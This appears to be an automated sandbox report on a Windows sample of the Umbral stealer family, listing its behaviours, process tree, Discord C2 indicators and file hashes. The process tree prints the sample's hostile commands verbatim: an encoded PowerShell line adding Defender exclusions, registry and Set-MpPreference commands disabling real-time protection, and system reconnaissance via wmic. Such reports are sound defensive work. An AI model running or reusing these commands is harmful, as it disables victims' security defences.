Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 16:50
Static task
static1
Behavioral task
behavioral1
Sample
9fa71bd01a54e0726de72e272bcbe6eb.exe
Resource
win7-20240903-en
General
-
Target
9fa71bd01a54e0726de72e272bcbe6eb.exe
-
Size
1.3MB
-
MD5
9fa71bd01a54e0726de72e272bcbe6eb
-
SHA1
03822545415f9dc69207495898c706c0d8340807
-
SHA256
666d91620d589b16b55f847c0c84396419461844d9ab844ad39a7df9d88c34e5
-
SHA512
32eaa6c191f077de67251af4057ee9fee6d9ea69d58ce6d6a1c6f5623ba26013152ae614d1465939f44ad9e2125caed786fa4abc821082845037a9ab1d2a27af
-
SSDEEP
24576:x0kpqP4E3+rAOymAfu86lJ5qKYv8aIlbRnxYUsNV/qXOlY/nZZMR:kwKcATbG8TKrOlNxqXTvMR
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/980-1331-0x0000000000400000-0x0000000000440000-memory.dmp family_umbral -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4860 created 3436 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 56 -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 4728 powershell.exe 464 powershell.exe 3520 powershell.exe 2788 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 9fa71bd01a54e0726de72e272bcbe6eb.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs 9fa71bd01a54e0726de72e272bcbe6eb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 41 discord.com 42 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 38 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4860 set thread context of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9fa71bd01a54e0726de72e272bcbe6eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1508 wmic.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3152 ipconfig.exe 4752 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 744 powershell.exe 744 powershell.exe 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 4728 powershell.exe 4728 powershell.exe 2788 powershell.exe 2788 powershell.exe 464 powershell.exe 464 powershell.exe 3520 powershell.exe 3520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe Token: SeDebugPrivilege 744 powershell.exe Token: SeDebugPrivilege 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeDebugPrivilege 980 AppLaunch.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeIncreaseQuotaPrivilege 1280 wmic.exe Token: SeSecurityPrivilege 1280 wmic.exe Token: SeTakeOwnershipPrivilege 1280 wmic.exe Token: SeLoadDriverPrivilege 1280 wmic.exe Token: SeSystemProfilePrivilege 1280 wmic.exe Token: SeSystemtimePrivilege 1280 wmic.exe Token: SeProfSingleProcessPrivilege 1280 wmic.exe Token: SeIncBasePriorityPrivilege 1280 wmic.exe Token: SeCreatePagefilePrivilege 1280 wmic.exe Token: SeBackupPrivilege 1280 wmic.exe Token: SeRestorePrivilege 1280 wmic.exe Token: SeShutdownPrivilege 1280 wmic.exe Token: SeDebugPrivilege 1280 wmic.exe Token: SeSystemEnvironmentPrivilege 1280 wmic.exe Token: SeRemoteShutdownPrivilege 1280 wmic.exe Token: SeUndockPrivilege 1280 wmic.exe Token: SeManageVolumePrivilege 1280 wmic.exe Token: 33 1280 wmic.exe Token: 34 1280 wmic.exe Token: 35 1280 wmic.exe Token: 36 1280 wmic.exe Token: SeIncreaseQuotaPrivilege 1280 wmic.exe Token: SeSecurityPrivilege 1280 wmic.exe Token: SeTakeOwnershipPrivilege 1280 wmic.exe Token: SeLoadDriverPrivilege 1280 wmic.exe Token: SeSystemProfilePrivilege 1280 wmic.exe Token: SeSystemtimePrivilege 1280 wmic.exe Token: SeProfSingleProcessPrivilege 1280 wmic.exe Token: SeIncBasePriorityPrivilege 1280 wmic.exe Token: SeCreatePagefilePrivilege 1280 wmic.exe Token: SeBackupPrivilege 1280 wmic.exe Token: SeRestorePrivilege 1280 wmic.exe Token: SeShutdownPrivilege 1280 wmic.exe Token: SeDebugPrivilege 1280 wmic.exe Token: SeSystemEnvironmentPrivilege 1280 wmic.exe Token: SeRemoteShutdownPrivilege 1280 wmic.exe Token: SeUndockPrivilege 1280 wmic.exe Token: SeManageVolumePrivilege 1280 wmic.exe Token: 33 1280 wmic.exe Token: 34 1280 wmic.exe Token: 35 1280 wmic.exe Token: 36 1280 wmic.exe Token: SeIncreaseQuotaPrivilege 4856 wmic.exe Token: SeSecurityPrivilege 4856 wmic.exe Token: SeTakeOwnershipPrivilege 4856 wmic.exe Token: SeLoadDriverPrivilege 4856 wmic.exe Token: SeSystemProfilePrivilege 4856 wmic.exe Token: SeSystemtimePrivilege 4856 wmic.exe Token: SeProfSingleProcessPrivilege 4856 wmic.exe Token: SeIncBasePriorityPrivilege 4856 wmic.exe Token: SeCreatePagefilePrivilege 4856 wmic.exe Token: SeBackupPrivilege 4856 wmic.exe Token: SeRestorePrivilege 4856 wmic.exe Token: SeShutdownPrivilege 4856 wmic.exe Token: SeDebugPrivilege 4856 wmic.exe Token: SeSystemEnvironmentPrivilege 4856 wmic.exe Token: SeRemoteShutdownPrivilege 4856 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 4860 wrote to memory of 2824 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 83 PID 4860 wrote to memory of 2824 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 83 PID 4860 wrote to memory of 2824 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 83 PID 2824 wrote to memory of 3152 2824 cmd.exe 85 PID 2824 wrote to memory of 3152 2824 cmd.exe 85 PID 2824 wrote to memory of 3152 2824 cmd.exe 85 PID 4860 wrote to memory of 744 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 99 PID 4860 wrote to memory of 744 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 99 PID 4860 wrote to memory of 744 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 99 PID 4860 wrote to memory of 4728 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 103 PID 4860 wrote to memory of 4728 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 103 PID 4860 wrote to memory of 4728 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 103 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 980 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 105 PID 4860 wrote to memory of 3320 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 106 PID 4860 wrote to memory of 3320 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 106 PID 4860 wrote to memory of 3320 4860 9fa71bd01a54e0726de72e272bcbe6eb.exe 106 PID 3320 wrote to memory of 4752 3320 cmd.exe 109 PID 3320 wrote to memory of 4752 3320 cmd.exe 109 PID 3320 wrote to memory of 4752 3320 cmd.exe 109 PID 980 wrote to memory of 2788 980 AppLaunch.exe 110 PID 980 wrote to memory of 2788 980 AppLaunch.exe 110 PID 980 wrote to memory of 2788 980 AppLaunch.exe 110 PID 980 wrote to memory of 464 980 AppLaunch.exe 113 PID 980 wrote to memory of 464 980 AppLaunch.exe 113 PID 980 wrote to memory of 464 980 AppLaunch.exe 113 PID 980 wrote to memory of 1280 980 AppLaunch.exe 115 PID 980 wrote to memory of 1280 980 AppLaunch.exe 115 PID 980 wrote to memory of 1280 980 AppLaunch.exe 115 PID 980 wrote to memory of 4856 980 AppLaunch.exe 117 PID 980 wrote to memory of 4856 980 AppLaunch.exe 117 PID 980 wrote to memory of 4856 980 AppLaunch.exe 117 PID 980 wrote to memory of 4204 980 AppLaunch.exe 119 PID 980 wrote to memory of 4204 980 AppLaunch.exe 119 PID 980 wrote to memory of 4204 980 AppLaunch.exe 119 PID 980 wrote to memory of 3520 980 AppLaunch.exe 121 PID 980 wrote to memory of 3520 980 AppLaunch.exe 121 PID 980 wrote to memory of 3520 980 AppLaunch.exe 121 PID 980 wrote to memory of 1508 980 AppLaunch.exe 123 PID 980 wrote to memory of 1508 980 AppLaunch.exe 123 PID 980 wrote to memory of 1508 980 AppLaunch.exe 123
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\9fa71bd01a54e0726de72e272bcbe6eb.exe"C:\Users\Admin\AppData\Local\Temp\9fa71bd01a54e0726de72e272bcbe6eb.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release4⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:3152
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOQBmAGEANwAxAGIAZAAwADEAYQA1ADQAZQAwADcAMgA2AGQAZQA3ADIAZQAyADcAMgBiAGMAYgBlADYAZQBiAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADkAZgBhADcAMQBiAGQAMAAxAGEANQA0AGUAMAA3ADIANgBkAGUANwAyAGUAMgA3ADIAYgBjAGIAZQA2AGUAYgAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHAAZABhAHQAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAHUAcABkAGEAdABlAC4AZQB4AGUA3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" PowerShell.exe -NoProfile -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$registryPath = 'HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'; $data = '1'; reg add 'HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t 'REG_DWORD' /d "^""$data"^"" /f"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew4⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:4752
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
PID:4204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:1508
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5d793d1487074980a8356773c5b757258
SHA1b3fd20180690bfe6ae226934ddc5c3f5e89dcbed
SHA2568004f09231519fc4db9aaac1f6fd824e2fa85fb88b05e69579553fa58907ce0f
SHA5120f66eaad777d33b9b7b6e813be15fc47641e0bbd85242f3fc76e5d4a92093fea1ad38e285c482a6d7674e99772384705308d544d7332b0e16a9e9a9f9f66c5ec
-
Filesize
14KB
MD505f01e726b859b04aafa81689a5ecc4d
SHA129169eccc01a2bdecf85be8a730095cc8199fdfa
SHA25622d8b4e8f0dfca49c63473a08935b4ed9e3ca14531e98c61a3e905d6efa5481f
SHA512ba5d92948f89dcc95d7746a316cf0f301ec08203cfb6b36bcfcfbcc36d8725acad36406e22bd5f6ae544a143a08f48e10afccaa3ba95d3fcde6671c2de498284
-
Filesize
18KB
MD540e40c8468c2d629ab4853997b3f8597
SHA1104a4a1c33540f4294a981fa03c11b0b68458abe
SHA256230dd9d3131d73059e9d24247397cdff1cac9b2d3de58d084a0b515987a36624
SHA5129fa91e96c54750ec7fc5f5524900c7c76f84d03740bf372f09f81f664146ab74b9aaf971524948058efff0237006696f32a8edc1e46c93255686fd7e623f2863
-
Filesize
15KB
MD5f79fd8cd98aeba6d5024f01561cc0fe9
SHA1f30aead8c3d85ddd6adc16fee122f4eed7655146
SHA2566b3562360de5453849e0741f47ebcb565c81527837b97ce49c272326d994b1a4
SHA512ef8b1a8f13e8033cae2ea9f6ca72514cfc012a90f2964f2167e7f40854cc76de83b1f2a197f76825cf0bbe69ceac943a57f5eca1a197728909abb1fe92850295
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82